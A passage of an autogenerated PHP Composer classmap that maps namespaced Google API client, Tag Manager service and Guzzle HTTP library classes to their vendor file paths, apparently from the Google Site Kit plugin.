$baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/StateDetails.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\SuspendedDetails' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/SuspendedDetails.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\UserEntitlementsPlan' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/UserEntitlementsPlan.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\SubscribewithGoogle\\WaitingToRecurDetails' => $baseDir . '/google/apiclient-services-subscribewithgoogle/SubscribewithGoogle/WaitingToRecurDetails.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager' => $baseDir . '/google/apiclient-services/src/TagManager.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Account' => $baseDir . '/google/apiclient-services/src/TagManager/Account.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\AccountAccess' => $baseDir . '/google/apiclient-services/src/TagManager/AccountAccess.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\AccountFeatures' => $baseDir . '/google/apiclient-services/src/TagManager/AccountFeatures.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\BuiltInVariable' => $baseDir . '/google/apiclient-services/src/TagManager/BuiltInVariable.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Client' => $baseDir . '/google/apiclient-services/src/TagManager/Client.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Condition' => $baseDir . '/google/apiclient-services/src/TagManager/Condition.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Container' => $baseDir . '/google/apiclient-services/src/TagManager/Container.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ContainerAccess' => $baseDir . '/google/apiclient-services/src/TagManager/ContainerAccess.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ContainerFeatures' => $baseDir . '/google/apiclient-services/src/TagManager/ContainerFeatures.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ContainerVersion' => $baseDir . '/google/apiclient-services/src/TagManager/ContainerVersion.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ContainerVersionHeader' => $baseDir . '/google/apiclient-services/src/TagManager/ContainerVersionHeader.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\CreateBuiltInVariableResponse' => $baseDir . '/google/apiclient-services/src/TagManager/CreateBuiltInVariableResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\CreateContainerVersionRequestVersionOptions' => $baseDir . '/google/apiclient-services/src/TagManager/CreateContainerVersionRequestVersionOptions.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\CreateContainerVersionResponse' => $baseDir . '/google/apiclient-services/src/TagManager/CreateContainerVersionResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\CustomTemplate' => $baseDir . '/google/apiclient-services/src/TagManager/CustomTemplate.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Destination' => $baseDir . '/google/apiclient-services/src/TagManager/Destination.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Entity' => $baseDir . '/google/apiclient-services/src/TagManager/Entity.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Environment' => $baseDir . '/google/apiclient-services/src/TagManager/Environment.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Folder' => $baseDir . '/google/apiclient-services/src/TagManager/Folder.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\FolderEntities' => $baseDir . '/google/apiclient-services/src/TagManager/FolderEntities.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\GalleryReference' => $baseDir . '/google/apiclient-services/src/TagManager/GalleryReference.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\GetContainerSnippetResponse' => $baseDir . '/google/apiclient-services/src/TagManager/GetContainerSnippetResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\GetWorkspaceStatusResponse' => $baseDir . '/google/apiclient-services/src/TagManager/GetWorkspaceStatusResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\GtagConfig' => $baseDir . '/google/apiclient-services/src/TagManager/GtagConfig.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListAccountsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListAccountsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListClientsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListClientsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListContainerVersionsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListContainerVersionsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListContainersResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListContainersResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListDestinationsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListDestinationsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListEnabledBuiltInVariablesResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListEnabledBuiltInVariablesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListEnvironmentsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListEnvironmentsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListFoldersResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListFoldersResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListGtagConfigResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListGtagConfigResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListTagsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListTagsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListTemplatesResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListTemplatesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListTransformationsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListTransformationsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListTriggersResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListTriggersResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListUserPermissionsResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListUserPermissionsResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListVariablesResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListVariablesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListWorkspacesResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListWorkspacesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ListZonesResponse' => $baseDir . '/google/apiclient-services/src/TagManager/ListZonesResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\MergeConflict' => $baseDir . '/google/apiclient-services/src/TagManager/MergeConflict.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Parameter' => $baseDir . '/google/apiclient-services/src/TagManager/Parameter.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\PublishContainerVersionResponse' => $baseDir . '/google/apiclient-services/src/TagManager/PublishContainerVersionResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\QuickPreviewResponse' => $baseDir . '/google/apiclient-services/src/TagManager/QuickPreviewResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\Accounts' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/Accounts.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainers' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainers.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersDestinations' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersDestinations.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersEnvironments' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersEnvironments.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersVersionHeaders' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersVersionHeaders.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersVersions' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersVersions.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspaces' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspaces.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesBuiltInVariables' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesBuiltInVariables.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesClients' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesClients.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesFolders' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesFolders.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesGtagConfig' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesGtagConfig.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesTags' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesTags.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesTemplates' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesTemplates.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesTransformations' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesTransformations.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesTriggers' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesTriggers.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesVariables' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesVariables.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsContainersWorkspacesZones' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsContainersWorkspacesZones.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Resource\\AccountsUserPermissions' => $baseDir . '/google/apiclient-services/src/TagManager/Resource/AccountsUserPermissions.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertBuiltInVariableResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertBuiltInVariableResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertClientResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertClientResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertFolderResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertFolderResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertTagResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertTagResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertTemplateResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertTemplateResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertTransformationResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertTransformationResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertTriggerResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertTriggerResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertVariableResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertVariableResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\RevertZoneResponse' => $baseDir . '/google/apiclient-services/src/TagManager/RevertZoneResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\SetupTag' => $baseDir . '/google/apiclient-services/src/TagManager/SetupTag.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\SyncStatus' => $baseDir . '/google/apiclient-services/src/TagManager/SyncStatus.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\SyncWorkspaceResponse' => $baseDir . '/google/apiclient-services/src/TagManager/SyncWorkspaceResponse.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Tag' => $baseDir . '/google/apiclient-services/src/TagManager/Tag.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\TagConsentSetting' => $baseDir . '/google/apiclient-services/src/TagManager/TagConsentSetting.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\TeardownTag' => $baseDir . '/google/apiclient-services/src/TagManager/TeardownTag.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Transformation' => $baseDir . '/google/apiclient-services/src/TagManager/Transformation.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Trigger' => $baseDir . '/google/apiclient-services/src/TagManager/Trigger.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\UserPermission' => $baseDir . '/google/apiclient-services/src/TagManager/UserPermission.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Variable' => $baseDir . '/google/apiclient-services/src/TagManager/Variable.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\VariableFormatValue' => $baseDir . '/google/apiclient-services/src/TagManager/VariableFormatValue.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Workspace' => $baseDir . '/google/apiclient-services/src/TagManager/Workspace.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\Zone' => $baseDir . '/google/apiclient-services/src/TagManager/Zone.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ZoneBoundary' => $baseDir . '/google/apiclient-services/src/TagManager/ZoneBoundary.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ZoneChildContainer' => $baseDir . '/google/apiclient-services/src/TagManager/ZoneChildContainer.php', 'Google\\Site_Kit_Dependencies\\Google\\Service\\TagManager\\ZoneTypeRestriction' => $baseDir . '/google/apiclient-services/src/TagManager/ZoneTypeRestriction.php', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Composer' => $baseDir . '/google/apiclient/src/Task/Composer.php', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Exception' => $baseDir . '/google/apiclient/src/Task/Exception.php', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Retryable' => $baseDir . '/google/apiclient/src/Task/Retryable.php', 'Google\\Site_Kit_Dependencies\\Google\\Task\\Runner' => $baseDir . '/google/apiclient/src/Task/Runner.php', 'Google\\Site_Kit_Dependencies\\Google\\Utils\\UriTemplate' => $baseDir . '/google/apiclient/src/Utils/UriTemplate.php', 'Google\\Site_Kit_Dependencies\\Google_AccessToken_Revoke' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_AccessToken_Verify' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_AuthHandler_AuthHandlerFactory' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_AuthHandler_Guzzle6AuthHandler' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_AuthHandler_Guzzle7AuthHandler' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Client' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Collection' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Exception' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Http_Batch' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Http_MediaFileUpload' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Http_REST' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Model' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Service' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Service_Exception' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAdSenseLink' => $baseDir . '/google/apiclient-services-adsenselinks/AdSenseLinks.php', 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListAdSenseLinksResponse' => $baseDir . '/google/apiclient-services-adsenselinks/AdSenseLinks.php', 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleProtobufEmpty' => $baseDir . '/google/apiclient-services-adsenselinks/AdSenseLinks.php', 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_PropertiesAdSenseLinks_Resource' => $baseDir . '/google/apiclient-services-adsenselinks/AdSenseLinks.php', 'Google\\Site_Kit_Dependencies\\Google_Service_Resource' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Task_Composer' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Task_Exception' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Task_Retryable' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Task_Runner' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\Google_Utils_UriTemplate' => $baseDir . '/google/apiclient/src/aliases.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\BodySummarizer' => $baseDir . '/guzzlehttp/guzzle/src/BodySummarizer.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\BodySummarizerInterface' => $baseDir . '/guzzlehttp/guzzle/src/BodySummarizerInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Client' => $baseDir . '/guzzlehttp/guzzle/src/Client.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientInterface' => $baseDir . '/guzzlehttp/guzzle/src/ClientInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\ClientTrait' => $baseDir . '/guzzlehttp/guzzle/src/ClientTrait.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Cookie\\CookieJar' => $baseDir . '/guzzlehttp/guzzle/src/Cookie/CookieJar.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Cookie\\CookieJarInterface' => $baseDir . '/guzzlehttp/guzzle/src/Cookie/CookieJarInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Cookie\\FileCookieJar' => $baseDir . '/guzzlehttp/guzzle/src/Cookie/FileCookieJar.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Cookie\\SessionCookieJar' => $baseDir . '/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Cookie\\SetCookie' => $baseDir . '/guzzlehttp/guzzle/src/Cookie/SetCookie.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\BadResponseException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/BadResponseException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\ClientException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/ClientException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\ConnectException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/ConnectException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\GuzzleException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/GuzzleException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\InvalidArgumentException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/InvalidArgumentException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\RequestException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/RequestException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\ServerException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/ServerException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\TooManyRedirectsException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/TooManyRedirectsException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Exception\\TransferException' => $baseDir . '/guzzlehttp/guzzle/src/Exception/TransferException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\HandlerStack' => $baseDir . '/guzzlehttp/guzzle/src/HandlerStack.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\CurlFactory' => $baseDir . '/guzzlehttp/guzzle/src/Handler/CurlFactory.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\CurlFactoryInterface' => $baseDir . '/guzzlehttp/guzzle/src/Handler/CurlFactoryInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\CurlHandler' => $baseDir . '/guzzlehttp/guzzle/src/Handler/CurlHandler.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\CurlMultiHandler' => $baseDir . '/guzzlehttp/guzzle/src/Handler/CurlMultiHandler.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\EasyHandle' => $baseDir . '/guzzlehttp/guzzle/src/Handler/EasyHandle.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\HeaderProcessor' => $baseDir . '/guzzlehttp/guzzle/src/Handler/HeaderProcessor.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\MockHandler' => $baseDir . '/guzzlehttp/guzzle/src/Handler/MockHandler.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\Proxy' => $baseDir . '/guzzlehttp/guzzle/src/Handler/Proxy.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Handler\\StreamHandler' => $baseDir . '/guzzlehttp/guzzle/src/Handler/StreamHandler.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\MessageFormatter' => $baseDir . '/guzzlehttp/guzzle/src/MessageFormatter.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\MessageFormatterInterface' => $baseDir . '/guzzlehttp/guzzle/src/MessageFormatterInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Middleware' => $baseDir . '/guzzlehttp/guzzle/src/Middleware.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Pool' => $baseDir . '/guzzlehttp/guzzle/src/Pool.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\PrepareBodyMiddleware' => $baseDir . '/guzzlehttp/guzzle/src/PrepareBodyMiddleware.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\AggregateException' => $baseDir . '/guzzlehttp/promises/src/AggregateException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\CancellationException' => $baseDir . '/guzzlehttp/promises/src/CancellationException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\Coroutine' => $baseDir . '/guzzlehttp/promises/src/Coroutine.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\Create' => $baseDir . '/guzzlehttp/promises/src/Create.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\Each' => $baseDir . '/guzzlehttp/promises/src/Each.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\EachPromise' => $baseDir . '/guzzlehttp/promises/src/EachPromise.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\FulfilledPromise' => $baseDir . '/guzzlehttp/promises/src/FulfilledPromise.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\Is' => $baseDir . '/guzzlehttp/promises/src/Is.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\Promise' => $baseDir . '/guzzlehttp/promises/src/Promise.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\PromiseInterface' => $baseDir . '/guzzlehttp/promises/src/PromiseInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\PromisorInterface' => $baseDir . '/guzzlehttp/promises/src/PromisorInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\RejectedPromise' => $baseDir . '/guzzlehttp/promises/src/RejectedPromise.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\RejectionException' => $baseDir . '/guzzlehttp/promises/src/RejectionException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\TaskQueue' => $baseDir . '/guzzlehttp/promises/src/TaskQueue.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\TaskQueueInterface' => $baseDir . '/guzzlehttp/promises/src/TaskQueueInterface.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Promise\\Utils' => $baseDir . '/guzzlehttp/promises/src/Utils.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\AppendStream' => $baseDir . '/guzzlehttp/psr7/src/AppendStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\BufferStream' => $baseDir . '/guzzlehttp/psr7/src/BufferStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\CachingStream' => $baseDir . '/guzzlehttp/psr7/src/CachingStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\DroppingStream' => $baseDir . '/guzzlehttp/psr7/src/DroppingStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Exception\\MalformedUriException' => $baseDir . '/guzzlehttp/psr7/src/Exception/MalformedUriException.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\FnStream' => $baseDir . '/guzzlehttp/psr7/src/FnStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Header' => $baseDir . '/guzzlehttp/psr7/src/Header.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\HttpFactory' => $baseDir . '/guzzlehttp/psr7/src/HttpFactory.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\InflateStream' => $baseDir . '/guzzlehttp/psr7/src/InflateStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\LazyOpenStream' => $baseDir . '/guzzlehttp/psr7/src/LazyOpenStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\LimitStream' => $baseDir . '/guzzlehttp/psr7/src/LimitStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Message' => $baseDir . '/guzzlehttp/psr7/src/Message.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\MessageTrait' => $baseDir . '/guzzlehttp/psr7/src/MessageTrait.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\MimeType' => $baseDir . '/guzzlehttp/psr7/src/MimeType.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\MultipartStream' => $baseDir . '/guzzlehttp/psr7/src/MultipartStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\NoSeekStream' => $baseDir . '/guzzlehttp/psr7/src/NoSeekStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\PumpStream' => $baseDir . '/guzzlehttp/psr7/src/PumpStream.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Query' => $baseDir . '/guzzlehttp/psr7/src/Query.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Request' => $baseDir . '/guzzlehttp/psr7/src/Request.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Response' => $baseDir . '/guzzlehttp/psr7/src/Response.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Rfc7230' => $baseDir . '/guzzlehttp/psr7/src/Rfc7230.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\ServerRequest' => $baseDir . '/guzzlehttp/psr7/src/ServerRequest.php', 'Google\\Site_Kit_Dependencies\\GuzzleHttp\\Psr7\\Stream' => $baseDir . '/guzzlehttp/psr7/src/Stream.php', 